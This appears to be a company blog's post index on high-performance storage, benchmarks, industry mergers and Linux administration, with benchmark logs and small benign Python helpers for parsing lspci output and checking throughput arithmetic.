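When scripting benchmark runs across mixed cards, it helps to turn `lspci` output into something a harness can loop over. A rough sketch is below. It parses the two VGA lines from the `lspci` session above, pasted in as a sample string. The regex, the `parse_vga` name, and the simple vendor tagging are assumptions of mine, not part of any benchmarking framework.

```python
import re

# The two VGA lines from the lspci session above, used as sample input.
SAMPLE = """\
3b:00.0 VGA compatible controller: NVIDIA Corporation GP100GL (rev a1)
88:00.0 VGA compatible controller: Advanced Micro Devices, Inc. [AMD/ATI] Vega 10 XTX [Radeon Vega Frontier Edition]
"""

# slot (bus:device.function), device class, then free-form description.
LINE = re.compile(
    r"^(?P<slot>[0-9a-f]{2}:[0-9a-f]{2}\.[0-7])\s+(?P<cls>[^:]+):\s+(?P<desc>.+)$"
)


def parse_vga(text):
    """Return a list of dicts describing each VGA device found in the text."""
    gpus = []
    for line in text.splitlines():
        match = LINE.match(line.strip())
        if not match or "VGA" not in match.group("cls"):
            continue
        desc = match.group("desc")
        lowered = desc.lower()
        if "nvidia" in lowered:
            vendor = "nvidia"
        elif "amd" in lowered:
            vendor = "amd"
        else:
            vendor = "unknown"
        gpus.append({"slot": match.group("slot"), "vendor": vendor, "desc": desc})
    return gpus


for gpu in parse_vga(SAMPLE):
    print(gpu["slot"], gpu["vendor"])
```

A harness could then pick the framework backend per card from the `vendor` field, rather than hard coding slot numbers.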
Posts
Oracle finally kills off Solaris and SPARC
This was making the rounds last week. Oracle seems to have a leak in its process, creating labels that trigger event notifications for people, for their packages. Solaris was decimated. More details at the links and at The Layoff. Honestly I had expected them to reach this point. I am guessing that they were contractually obligated for at least 7 years to provide Solaris/SPARC support to US government purchasers. SGI went through a similar thing with IRIX.
Posts
M&A and business things
First up, Tegile was acquired by Western Digital (WDC). This is in part due to WDC’s desire to be a one stop shop vertically integrated supplier for storage parts, systems, etc. This is how all of the storage parts OEMs needed to move, though Seagate failed to execute this correctly, selling off their array business in part to Cray. Toshiba … well … they have some existential challenges right now, and are about to sell off their profitable flash and memory systems business, if they can just get everyone to agree … This comes from the fact that spinning disk, while a venerable technology, has been effectively completely commoditized.
Posts
Cray "acquires" ClusterStor business unit from Seagate
Information at this link. It is being called a “strategic transaction”, though it likely came about after Seagate did some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of their earlier acquisition of Xyratex. Xyratex was the basis for the Cray storage platforms (post Engenio).
Posts
What reduces risk ... a great engineering and support team, or a brand name ?
I’ve written about approved vendors and the “one throat to choke” concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems … was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk who might have something of interest, and the larger folk who might come in with a different ecosystem.
Posts
I always love these breathless stories of great speed, and how VCs love them ...
Though, when I look at the “great speed”, it is often on par with or less than Scalable Informatics sustained years before. From 2013 SC13 show, on the show floor, after blasting through a POC at unheard of speed, and setting long standing records in the STAC-M3 benchmarks …
Article in question is in the Register. Some of the speeds and feeds:
* 200 microsecs latency
* 45GBps read bandwidth
* 15GBps write bandwidth
* 7 million IOPS

But then … a fibre connection.
Posts
pcilist: because sometimes you really, really need to know how your PCIe devices are configured
If you don’t know what I am talking about here, that’s fine. I’ll assume you don’t do hardware, or you call someone else when there is a hardware problem. If you think “well gee, don’t we have lspci? so why do we need this?” then you probably have not really tried to use lspci to find this information, or didn’t know it was available. Ok … what I am talking about.
Posts
Brings a smile to my face ... #BioIT #HPC accelerator
Way way back in the early aughts (2000’s), we had built a set of designs for an accelerator system to speed up things like BLAST, HMMer, and other codes. We were told that no one would buy such things, as the software layer was good enough and people didn’t want black boxes. This was part of an overall accelerator strategy that we had put together at the time, and were seeking to raise capital to build.
Posts
Another article about the supply crisis hitting #SSD, #flash, #NVMe, #HPC #storage in general
I’ve been trying to help Scalable Informatics customers understand these market realities for a while. Unfortunately, to my discredit, I’ve not been very successful at doing so … and many groups seem to assume supply is plentiful and cheap across all storage modalities. Not true. And not likely true for at least the rest of the year, if not longer. This article goes into some depth that I’ve tried to explain to others in phone conversations, private email threads.
Posts
Architecture matters, and yes Virginia, there are no silver bullets for performance
Time and time again, the day job had been asked to discuss how the solutions are differentiated. Time and time again, we showed benchmarks on real workloads that show significant performance deltas. Not 2 or 3 sigma measurements. More often than not, 2x -> 10x better. Yet … yet … we were asked, again and again, how we did it. We pointed to our architecture. But, they complained, isn’t it the same as X (insert your favorite volume vendor here)?
Posts
Another itch scratched
So there you are, with many software RAIDs. You’ve been building and rebuilding them. And somewhere along the line, you lost track of which devices were which. So somehow you didn’t clean up the last build right, and you thought you had a hot spare … until you looked at /proc/mdstat … and said … Oh … So. I wanted to do the detailed accounting, in a simple way. I want the tool to tell me if I am missing a physical drive (e.
Posts
Another fun bit of debugging
Ok … so here you are doing a code build. Your environment is all set. You have ample space. Lots of CPU, lots of RAM. All packages are up to date. You start your make. You have another window open with dstat running, just to kinda, sorta watch the system, while you are doing other things. And while you are working, you realize dstat has stopped scrolling. Strange, why would that be.
Posts
On expectations
This has happened multiple times over the last few months. Just variations on the theme as it were, so I’ll talk about the theme. The day job builds some of the fastest systems for storage and analytics in market. We pride ourselves on being able to make things go very … very fast. If it’s slow, IMO, it’s a bug. So we often get people contacting us with their requirements. These requirements are often very hard for our competitors, and fairly simple for us to address.
Posts
@scalableinfo 60 bay Unison with these: 3.6PB raw per 4U box
Color me impressed … Seagate and their 60TB 3.5inch SAS drive. Yes, the 60 bay Unison units can handle this. That would be 3.6PB per 4U unit. 10x 4U per 48U rack. 36PB raw per rack. 100PB in 3 racks, 30 racks for an exabyte (EB). The issue would be the storage bandwidth wall height. Doing the math, 60TB/(1GB/s) -> 6 x 10^4 seconds to empty/fill such a single unit. We can drive these about 50GB/s in a box, so a single box would be 3600TB/(50GB/s) or 7.
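The "bandwidth wall" arithmetic in this post is easy to check in a few lines of Python. This is only a sketch using the figures quoted above (60TB drives, roughly 1GB/s per drive, 60 bays, about 50GB/s per box) and assuming decimal units; the helper name `fill_time_seconds` is made up for this example.

```python
TB = 1e12  # decimal terabyte, in bytes (assumption: drive-vendor units)
GB = 1e9   # decimal gigabyte, in bytes


def fill_time_seconds(capacity_bytes, bandwidth_bytes_per_s):
    """Time to completely fill (or drain) a device at a sustained rate."""
    return capacity_bytes / bandwidth_bytes_per_s


# One 60TB drive streamed at about 1GB/s.
drive = fill_time_seconds(60 * TB, 1 * GB)

# One 60 bay box (60 x 60TB = 3600TB) driven at about 50GB/s.
box = fill_time_seconds(60 * 60 * TB, 50 * GB)

print(f"single drive: {drive:.0f} s ({drive / 3600:.1f} h)")
print(f"60 bay box:   {box:.0f} s ({box / 3600:.1f} h)")
```

Either way the answer lands in the tens of thousands of seconds, which is the point: capacity is growing much faster than the pipe you fill it through.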
Posts
Raw Unapologetic Firepower: kdb+ from @Kx
While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I’ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. It’s not quite an exact description; have a look at Kx’s website for a more accurate one.
Posts
Systemd and non-desktop scenarios
So we’ve been using Debian 8 as the basis of our SIOS v2 system. Debian has a number of very strong features that make it a fantastic basis for developing a platform … for one, it doesn’t have significant negative baggage/technical debt associated with poor design decisions early on in the development of the system as others do. But it has systemd. I’ve been generally non-committal about systemd, as it seemed like it should improve some things, at a fairly minor cost in additional complexity.
Posts
Talk from #Kxcon2016 on #HPC #Storage for #BigData analytics is up
See here, which was largely about how to architect high performance analytics platforms, and a specific shout out to our Forte NVMe flash unit, which is currently available in volume starting at $1 USD/GB. Some of the more interesting results from our testing:
* 24GB/s bandwidth largely insensitive to block size.
* 5+ Million IOPs random IO (5+MIOPs) sensitive to block size.
* 4k random read (100%) were well north of 5M IOPs.
Posts
new SIOS feature: compressed ram image for OS
Most people use squashfs which creates a read-only (immutable) boot environment. Nothing wrong with this, but this forces you to have an overlay file system if you want to write. Which complicates things … not to mention when you overwrite too much, and run out of available inodes on the overlayfs. Then your file system becomes “invalid” and Bad-Things-Happen(™). At the day job, we try to run as many of our systems out of ram disks as we can.
Posts
It is 2016 ... why am I fighting with LDAP authentication in linux? Why doesn't it just work?
Ok … very long story that boils down to us trying to help a customer out. I am trying to avoid the “let’s just add another user to /etc/passwd” or similar such thing. And they aren’t quite ready to hook into AD or similar. So we have this issue. I want to enable their nodes to use ldap. I’ve done this before for other customers with older tools (pam_ldap, etc.). But it was somewhat crazy (as in non-trivial), involving gnashing of teeth, gums, etc.
Posts
Not even breaking a sweat: 10GB/s write to single node Forte unit over 100Gb net #realhyperconverged #HPC #storage
TL;DR version: 10GB/s write, 10GB/s read in a single 2U unit over 100Gb network to a backing file system. This is tremendous. The system and clients are using our default tuning/config. Real hyperconvergence requires hardware that can move bits to/from storage/networking very quickly. This is that. These units are available. Now. In volume. And are very reasonably priced (starting at $1USD/GB). Contact us for more details. This is with a file system …
Posts
Massive unapologetic storage firepower part 4: On the test track with a Forte unit ... vaaaaROOOOOOMMMMMMM!!!!!
I am trying to help people conceptualize the experience. Here is a video depicting very fast, very powerful cars and their sound signatures.
This is a good start. Take one of those awesome machines, and turn off half the engine. So it is literally running with 1/2 of its power turned off. Remember this. There will be a quiz. As we flippantly noted in the video, this is face-melting performance. Had I any hair left, it would have been blown way back.
Posts
When infinite resources aren't, and why software assumes they are infinite
We’ve got customers with very large resource machines. And software that sees all those resources and goes “gimme!!!!”. So people run. And then more people use it. And more runs. Until the resources are exhausted. And hilarity (of the bad kind) ensues. These are firedrills. I get an open ticket that “there must be something wrong with the hardware”, when I see all the messages in console logs being pulled in from ICL saying “zOMG I am out of ram ….
Posts
M&A: NetApp grabs SolidFire
This one has been in the rumor mill for a while. NetApp has been needing something to play well in the all flash array space, and it now has something. This said, the array space is very much on the decline certainly with respect to dumb JBODs and smart “filer heads”. That design is being retired in favor of smarter and hyperconverged systems. Such as Unison with Ceph, Forte, and related HCI (hyper converged infrastructure) systems.
Posts
Testing a new @scalableinfo Unison #Ceph appliance node for #hpc #storage
Simple test case, no file system … using raw devices, what can I push out to all 60 drives in 128k chunks. Actually this is part of our burn-in test series, I am looking for failures/performance anomalies.
----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system--
usr sys idl wai hiq siq| read writ| recv send| in out | int csw
0 1 95 5 0 0| 513M 0 | 480B 0 | 0 0 | 10k 20k
4 2 94 0 0 0| 0 0 | 480B 0 | 0 0 |5238 721
0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4913 352
0 2 98 0 0 0| 0 0 | 570B 90B| 0 0 |4966 613
0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4912 413
0 2 98 0 0 0| 0 0 | 584B 92B| 0 0 |4965 334
0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4914 306
0 2 98 0 0 0| 0 0 | 636B 147B| 0 0 |4969 483
0 2 98 0 0 0| 0 0 | 570B 0 | 0 0 |4915 377
8 8 50 32 0 2|7520k 8382M| 578B 0 | 0 0 | 76k 215k
9 7 30 52 0 3|8332k 12G| 960B 132B| 0 0 | 109k 279k
10 5 29 53 0 2|4136k 12G| 240B 0 | 0 0 | 109k 277k
12 6 29 51 0 2|4208k 12G| 240B 0 | 0 0 | 108k 280k
11 6 31 50 0 2|2244k 12G| 330B 90B| 0 0 | 109k 281k
11 6 30 50 0 3|2272k 13G| 240B 0 | 0 0 | 110k 281k
Writes around 12.
Posts
Video interview: face melting performance in #hpc #nvme #storage @scalableinfo
Oh no … we didn’t say “face melting” … did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com You can see the video itself here on YouTube, but read Rich’s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.
Posts
There are no silver bullets, 2015 edition
In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big … uh … “data” ?) into golden nuggets of actionable data. Many of the “solutions” marketed these days are exactly like that … “add our magic bean software to your pipeline and you will gain insight faster.
Posts
A wonderful read on metrics, profiling, benchmarking
Brendan Gregg’s writings are always interesting and informative. I just saw a link on hacker news to a presentation he gave on “Broken Performance Tools”. It is wonderful, and succinctly explains many things I’ve talked about here and elsewhere, but it goes far beyond what I’ve grumbled over. One of my favorite points in there is slide 83. “Most popular benchmarks are flawed” and a pointer to a paper (easy to google for).
Posts
Shiny #HPC #storage things at #SC15
Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison)
* 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system
* 100Gb connection to a partner/customer booth
* Forte

100Gb is awesome. The first time I ran an iperf bidirectional test, saw 20GB/s … it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.
Posts
Cat peeking out of bag: Schedule of presentations and talks in our booth for SC15 is up
I mentioned previously that we have some new (shiny) things … and it looks like you’ll be able to hear about them at my talk. See the schedule for timing information. This said, please note that we have a terrific line up of people giving talks:
* Fintan Quill from Kx on kdb+ … which is an awesome market leading Big Data Time Series analytics and database tool that runs absolutely balls-out insanely fast on our architecture
* Christian Mohrbacher from Thinkparq on BeeGFS … the primary parallel file system we are leveraging for Unison parallel file system appliances
* Mark Nelson from Inktank/Red Hat on Ceph … the reliable block and object storage system that we’ve built into our Unison Object/Block Storage appliance
* Doug Eadline from Basement Supercomputing on Hadoop, and likely showing a Limulus deskside Hadoop appliance
* Phil Mucci from Minimal Metrics on optimization problems for systems and code.
Posts
M&A: EMC gobbled by Dell
Need to think how this will play out. The Register’s take is here. It seems that this will solve the “shareholder value” problem indicated by Elliott Management (e.g. they wanted more return on their investment). As part of increasing the return of value to shareholders, EMC had been in a cost cutting mode. Layoffs have been in process, and likely products trimmed or refocused. Once this goes through (assuming regulators won’t protest), Dell will have
Posts
As the benchmark cooks
We are involved in a fairly large benchmark for a potential customer. I won’t go into many specifics, though I should note that lots of our Unison units are involved. Current architecture has 5 storage nodes (6th was temporarily removed to handle a customer issue). Each Unison node has a pair of 56GbE NICs, as well as our appliance OS, and bunches of other goodness (quite a bit of flash). Total capacity for test is of order 200TB of flash.
Posts
rebuilding our kernel build system for fun and profit
No, really mostly to clean up an accumulation of technical debt that was really bugging the heck out of me. I like Makefiles and I cannot lie. So I like encoding lots of things in them. But it wound up hardwiring a number of things that shouldn’t have been hardwired. And made the builds brittle. When you have 2 released/supported kernels, and a handful of experimental kernels, it gets hard making changes that will be properly reflected across the set.
Posts
Drama at Violin Memory
Violin has had a rather tumultuous time in market. Post IPO, they’ve not had a great time selling. They have an interesting product, but with SanDisk coming out with their kit, and many others in the competitive flash array space, this can’t be a fun time for them. They don’t have a large installed base to protect, and their competitors are numerous and fairly well funded. Add to the mix that, as a post-IPO public company, they no longer have the luxury of not hitting targets … they will get slaughtered in the market.
Posts
On storage unicorns and their likely survival or implosion
The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy “standard” valuation norms, and hold onto their private status longer than those in the past. That is, they aren’t in a rush to IPO or get acquired.
The article goes on to analyze the “storage” unicorns, those in the “storage” field. They admix storage, nosql, hyperconverged, and storage as a service.
Posts
Imitation and repetition is a sincere form of flattery
A few years ago, we demonstrated some truly awesome capability in single racks and on single machines. We had one of our units (now at a customer site), specifically the unit that set all those STAC M3 records, showing this:
and a rack of our units (now providing high performance cloud service at a customer site)
for 8k random reads across 0.25 PB of storage on a very fast 40GbE backbone.
Posts
diagnostics
This is something of a hard post to write, for a number of reasons, not the least of which is that the topic comes as something of a surprise to me. I am just going to state it, and then discuss it. The vast majority of people (and companies) out there who think they know something of hardware/software/system level diagnostics and problem identification (from newbie to “veteran”) are either full of it, or really clueless.
Posts
Booth at BioIT World 15 in Boston
Should be fun, we will have booth (#461) on the side near the thoroughfare for the talks. Our HPC on Wall Street booth looked like this:
[ ](/images/HPConWS-booth-spring2015.jpg)
The display on the monitor is from our FastPath Cadence machine, and is part of the performance dashboard, built upon InfluxDB, Grafana, sios-metrics, and influxdbcli. Here is a blown up view, note the vertical axes for BW (GB/s) and IOPs.
[ ](/images/cadence-dash-spring2015.jpg)
Posts
The world’s fastest hyper-converged appliance is faster and more affordable than ever
This is a very exciting hyper-converged system, representing our next generation of time series, and big data analytical systems. Tremendous internal bandwidths coupled with massive internal parallelism, and minimal latency design on networks. This unit has been designed to focus upon delivering the maximal performance possible in as minimal a footprint … both rack based and cost wise … as possible. You can use these as independent stand alone units, or integrate them into a larger FastPath Unison system. We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl.
Posts
Interesting Q1 so far for day job
Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on.
Posts
love/hate relationship with new hardware
One of the dangers of dealing with newer hardware is that, often, it doesn’t work so well. Or the drivers get hosed in mysterious ways. We’ve got some nice shiny new 10GbE cards for a set of Unison systems going into a customer next week. We had some very odd issues with other 10GbE cards, so we rolled over to newer design cards. Younger silicon, younger design. Newer kernel module. I can’t say I am enjoying this experience thus far.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Finally, a desktop Linux that just works
I’ve been a user of Linux on the desktop, as my primary desktop, for the last 16 years. In that time, I’ve had laptops with Windows flavors (95, XP, 2000, 7), and a MacOSX desktop. Before that, the first laptop I had bought (while working on my thesis) was a triple boot job, with DOS, Windows 9x, and OS/2. I used the latter for when I was traveling and needed to write; the thesis was written in LaTeX and I could easily move everything back and forth between that and my Indy at home, and my office Indigo.
Posts
Coraid may be going down
According to The Register. No real differentiation (AoE isn’t that good, and the Seagate/Hitachi network drives are going to completely obviate the need for such things). We once used and sold Coraid to a customer. The linux client side wasn’t stable. iSCSI was coming up and was actually quite a bit better. We moved over to it. This was during our build vs buy phase. We weren’t sure if we could build a better box.
Posts
Inventory reduction @scalableinfo
It’s that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
* 16-24 processor cores
* 128 GB RAM
* 48x {2,3,4} TB top mount drives
* 4x rear mount SSDs (OS/metadata cache)
* Scalable OS (Debian Wheezy based Linux OS)
* 3 year warranty

As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
Systemd, and the future of Linux init processing
An interesting thing happened over the last few months and years. Systemd, a replacement init process for Linux, gained more adherents, and supplanted the older style init.d/rc scripting in use by many distributions. Ubuntu famously abandoned init.d style processing in favor of upstart and others in the past, and has been rolling over to systemd. Red Hat rolled over to Systemd. As have a number of others. Including, surprisingly, Debian. For those who don’t know what this is, think of it this way.
Posts
#SC14 day 2: @LuceraHQ tops @scalableinfo hardware ... with Scalable Info hardware ...
Report XTR141111 was just released by STAC Research for the M3 benchmarks. We are absolutely thrilled, as some of our records were bested by newer versions of our hardware with a newer software stack. Congratulations to Lucera, STAC Research for getting the results out, and the good folks at McObject for building the underlying database technology. This result continues and extends Scalable Informatics’ domination of the STAC M3 results. I’ll check to be sure, but I believe we are now the hardware side of most of the published records.
Posts
Starting to come around to the idea that swap in any form, is evil
Here’s the basic theory behind swap space. Memory is expensive, disk is cheap. Only use the faster memory for active things, and aggressively swap out the less used things. This provides a virtual address space larger than physical/logical memory. Great, right? No. Here’s why.
Swap makes the assumption that you can always write/read to persistent memory (disk/swap). It never assumes persistent memory could have a failure. Hence, if some amount of paged data on disk suddenly disappeared, well … Put another way, it increases your failure likelihood, by involving components with higher probability of failure into a pathway which assumes no failure.
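To put a rough shape on "increases your failure likelihood": if a pathway only works when every component in it works, and failures are independent, the chance of the pathway failing is one minus the product of the individual survival probabilities. A minimal sketch follows; the per-component probabilities are made-up illustrative numbers, not measurements, and the independence assumption is a simplification.

```python
def pathway_failure_probability(component_failure_probs):
    """Probability that a series pathway fails, assuming independent
    component failures: 1 - product(1 - p_i)."""
    survive = 1.0
    for p in component_failure_probs:
        if not 0.0 <= p <= 1.0:
            raise ValueError("probabilities must be between 0 and 1")
        survive *= 1.0 - p
    return 1.0 - survive


# Hypothetical numbers, chosen only to show the effect.
ram_only = pathway_failure_probability([0.001])
ram_plus_swap_disk = pathway_failure_probability([0.001, 0.02])

print(f"RAM only:        {ram_only:.4f}")
print(f"RAM + swap disk: {ram_plus_swap_disk:.4f}")
```

Adding a less reliable component to the path can only push the total up, and the least reliable piece tends to dominate.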
Posts
30TB flash disk, Parallel File System, massive network connectivity
This will be fun to watch run …
Scalable Informatics FastPath Unison for the win!
Posts
SC14 T minus 6 and counting
Scalable’s booth is #3053. We’ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!
Posts
massive unapologetic firepower part 2 ... the dashboard ...
For Scalable Informatics Unison product. The whole system:
[ ](/images/dash-2.png)
Watching writes go by:
[ ](/images/dash-3.png)
Note the sustained 40+ GB/s. This is a single rack sinking this data, and no SSDs in the bulk data storage path. This dashboard is part of the day job’s FastPath product.
Posts
Updated boot tech in Scalable OS (SIOS)
This has been an itch we’ve been working on scratching a few different ways, and it’s very much related to forgoing distro based installers. Ok, first the back story. One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn’t matter if it’s RAIDed in hardware/software. It’s a pathway that can fail. And when it fails, all hell breaks loose.
Posts
Interesting bits around EMC
In the last few days, issues around EMC have become publicly known. EMC is the world’s largest and most profitable storage company, and has a federated group of businesses that are complementary to it. The CEO, Joe Tucci, is stepping down next year, and there is a succession “process” going on. Couple this to a fundamental shift in storage, from arrays to distributed tightly coupled server storage, such as Unison, which is problematic for their core business.
Posts
Comcast finally fixed their latency issue
This has been a point of contention for us for years. Our office has multiple network attachments, and Comcast is one of them. This is the main office, not the home office. Latency on the link, as measured by DNS pings, has always been fairly high, in the multiple millisecond (2-3ms) region, as compared to our other connection (using a different provider and a different technology) which has been consistently 0.5ms for the last 2 years.
Posts
Soon ... 12g goodness in new chassis
This is one of our engineering prototypes that we had to clear space for. A couple of new features I’ll talk about soon, but you should know that these are 12g SAS machines (will do 6g SATA of course as well).
Front of unit:
[ ](/images/IMG_2330.JPG)
Note the new logo/hand bar. The rails are also brand new, and are set to enable easy slide in/out even with 100+ lbs of disk in them.
Posts
M&A: PLX snarfed by ... Avago ?
Ok, didn’t see this acquirer coming, but PLX being bought … yeah, this makes sense. Avago looks like they are trying to become the glue between systems, whether the glue is a data storage fabric, or communications fabric, etc. PLX makes PCIe switches and other kit. PCIe switch and interconnection is the direction that many are converging to. Best end to end latencies, best per-lane performance, no protocol stack silliness to deal with.
Posts
Selling inventory to clear space
[Update 16-June] We’ve sold the 64 bay FastPath Cadence (siFlash based), and now we have a few more 60 bay hybrid Ceph and FhGFS units, as well as a 48 bay front mount siFlash. What’s coming in are many of our next gen 60 bay units, with a new backplane design, and we want to start running benchmarks with them ASAP. As we have limited space in our facility, we gotta make hard choices … Email me (landman@scalableinformatics.
Posts
Massive, unapologetic, firepower: 2TB write in 73 seconds
A 1.2PB single mount point Scalable Informatics Unison system, running an MPI job (io-bm) that just dumps data as fast as the little Infiniband FDR network will allow. Our test case. Write 2TB (2x overall system memory) to disk, across 48 procs. No SSDs in the primary storage. This is just spinning rust, in a single rack. This is performance pr0n, though safe for work.
usn-01:/mnt/fhgfs/test # df -H /mnt/fhgfs/
Filesystem Size Used Avail Use% Mounted on
fhgfs_nodev 1.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there who will tell you that it’s pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
We had a record setting, knock the barn doors down year last year
… and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances … I am blown away as to how perfect a fit they are for folks.
Posts
Yay, latest Java update broke Supermicro remote console
JRE 7 u 51. Self signed Java console applet. Let the hilarity begin. I tried uploading our own cert and key to the unit. No luck. It’s the applet that needs to be re-signed. This is the joyous message that awaits:
Of course, the IPMIview tool sorta kinda works. Though it’s useless for remote support ops. Doesn’t set off the signed issue. Mebbe they ignore signing? Which is worse … the self signed cert, or the sign ignoring app.
Posts
Calxeda restructures
The day job had been talking to and working with Calxeda for a while. They’ve been undergoing some changes over the last few months as they worked to transition from an evangelist to a systems builder. The day job just got a note that they are restructuring. What this specifically means to an outsider, I am not sure, though I could speculate. HP has a vested interest in them. I wouldn’t be surprised to see a rapid asset acquisition.
Posts
Day job at HPC on Wall Street on Monday the 9th
We’ll be showing off 2 appliances, with a change of what we are showing/announcing on one due to something not being ready on the business side. The first one is our little 108 port siRouter box. Think ‘bloody fast NAT’ and SDN in general, you can run other virtual/bare metal apps atop it.
The second will be a massive scale parallel SQL DB appliance. Usable for big data, hadoop like workloads, and other similar workloads more commonly used on other well known platforms.
Posts
... and the positions are now, finally open ...
See the Systems Engineering position here, and the System Build Technician position here. I’ll get these up on the InsideHPC.com site and a few others soon (tomorrow). But they are open now. For the Systems Engineering position, we really need someone in NYC area with a strong financial services background … Doug made me take out the “able to leap tall buildings in a single bound” line, as well as the “must be able to talk customers through complex vi sessions on system configuration files while driving 70 mph on a highway.
Posts
Massive. Unapologetic. Firepower. 24GB/s from siFlash
Oh yes we did. Oh yes. We did. This is the fastest storage box we are aware of, in market. This is so far outside of ram, and outside of OS and RAID level cache …
    [root@siFlash ~]# fio srt.fio
    ...
    Run status group 0 (all jobs):
       READ: io=786432MB, aggrb=23971MB/s, minb=23971MB/s, maxb=23971MB/s, mint=32808msec, maxt=32808msec

This is 1TB read in 40 seconds or so. 1PB read in 40k seconds (1/2 a day).
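The read-time estimates can be checked straight from the fio numbers. This is a minimal sketch: the helper name is made up for illustration, and decimal units (1 TB = 10^6 MB) are an assumption rather than something the fio run states.

```python
# Figures copied from the fio output above.
IO_MB = 786432        # total data read, in MB
RUNTIME_MS = 32808    # run time, in msec

def seconds_to_read(size_mb: float, rate_mb_s: float) -> float:
    """Time to stream size_mb at a sustained rate of rate_mb_s (hypothetical helper)."""
    return size_mb / rate_mb_s

# Aggregate bandwidth recomputed from io and mint; should land near fio's aggrb.
rate_mb_s = IO_MB / (RUNTIME_MS / 1000.0)

# Decimal units are an assumption: 1 TB = 1e6 MB, 1 PB = 1e9 MB.
tb_seconds = seconds_to_read(1_000_000, rate_mb_s)
pb_hours = seconds_to_read(1_000_000_000, rate_mb_s) / 3600.0

print(f"rate: {rate_mb_s:.0f} MB/s")
print(f"1 TB: {tb_seconds:.1f} s")
print(f"1 PB: {pb_hours:.1f} h")
```

Under those assumptions 1 TB takes a little over 40 seconds and 1 PB a bit under 12 hours, which matches the rough figures quoted above.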
Posts
Updated DeltaV4 quick benchies
Streaming reads and writes. Far beyond memory/cache/… all spinning disk. Remember, this is our “slow” storage.
    [root@dv4-1 ~]# df -h /data
    Filesystem      Size  Used Avail Use% Mounted on
    /dev/md2         55T   65G   55T   1% /data

    Run status group 0 (all jobs):
      WRITE: io=65505MB, aggrb=1467.7MB/s, minb=1467.7MB/s, maxb=1467.7MB/s, mint=44633msec, maxt=44633msec

    Run status group 0 (all jobs):
       READ: io=65412MB, aggrb=1814.5MB/s, minb=1814.5MB/s, maxb=1814.5MB/s, mint=36050msec, maxt=36050msec
Posts
We built that: 10 years in business
[warning: longer post] I mentioned this on twitter (@sijoe). The day job has been in business for 10 years. We’ve not taken outside investment to date, and we’ve not sold the company yet. We’ve been profitable and growing continuously during our lifetime. The preceding 3 years have seen growth, accelerating hard. The company was built starting with a conviction that practitioners and users of HPC systems needed better designs, better systems than were being pushed out by traditional vendors in the early 2000’s.
Posts
the mystery of the week
Customer has had a machine for a while. Generally stable. Followed our advice on doing a reboot recently. Unit started crashing Monday. Then today. Hard to stay up and stable. I asked if anything has changed, and haven’t gotten anything conclusive … mostly “we don’t think so”. About the crashes: Nothing in the logs. Not a thing. No hardware subsystem, which has logging enabled (RAID, motherboard, PCIe, IPMI, … ) reports an error.
Posts
2 out of 3 ain't bad
No, not Meatloaf lyrics. A few years ago, I guessed that the HPC market was going to bifurcate or possibly trifurcate. Well, it’s about 3 years on, and bifurcate it did. Accelerators (in the form of GPUs) are everywhere. I was dead on correct in almost every aspect of what I had predicted (privately to VCs, from whom we couldn’t raise a cent in the early/mid 2000’s for this market). Remote cluster/clouds with dropping prices per CPU hour are taking over sections of HPC, and we see some impact upon purchase decisions made by people buying clusters.
Posts
Is this really a good idea?
Looks like HP is looking at ditching its PCs. First off, they are definitely killing off WebOS and the whole Palm business. Ok … WebOS looked interesting. Now having an Android, and an iPhone (about to be retired, which the Android is replacing), I find it hard to put down the iPhone and get excited about Android. I have a sense of … a less polished integration. Some things don’t work very well in Android.
Posts
